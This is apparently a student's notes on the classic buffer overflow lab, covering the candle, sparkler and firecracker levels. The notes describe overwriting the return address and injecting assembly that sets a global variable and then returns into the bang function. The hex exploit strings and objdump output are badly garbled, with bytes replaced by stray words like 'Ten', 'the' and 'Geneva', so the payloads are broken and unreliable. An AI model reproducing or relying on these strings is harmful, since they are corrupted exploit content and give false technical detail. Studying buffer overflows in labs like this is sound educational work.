Buffer overflows Lab

The stack probably looks like this.

Level 0:candle

Just cover the return, okay?

Like what:

C0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xx 

Level 1:sparkler

Require that arg be changed to a cookie value

C0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xx  - Ten  + xx xx xx xx xxB6 C4 FD inB2 the  Geneva3f b6 c4 FD inB2 the  Geneva3f

Level 2:firecracker

Requires that the global value inside the bang be set to the cookie value.

The idea is to return to a specific piece of code on the stack, execute our code to replace global value, and then return to the Bang function

Replace the assembly code for global

movmov  %rsi, 0x602308push  $0x00401020retq

Pass

$ gcc-c test.s$ objdump-d test.o > TEST.D

Generate binary code

Test.o:File Format elf64-x86- -disassembly of section.Text:0000000000000000<.text>:0: -8b the  -  -  at  -     mov0x602320,%rsi7:xx    8: -  the  the  -  ,  at  -     mov%rsi,0x602308F:    xx   Ten: the  - Ten  + xxPushq $0x401020 the: C3 RETQ

Then insert this binary code into a specific stack segment

 -8b the  -  -  at  - xx  -  the  the  -  ,  at  - xx  the  - Ten  + xxC3xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xxC0Ten  + xx xx xx xx xx xxB7 FF FF FF 7fxx xx

That's OK.

Extra Credit–level 3:dynamite the next time.

2015-09-28

Buffer overflows Lab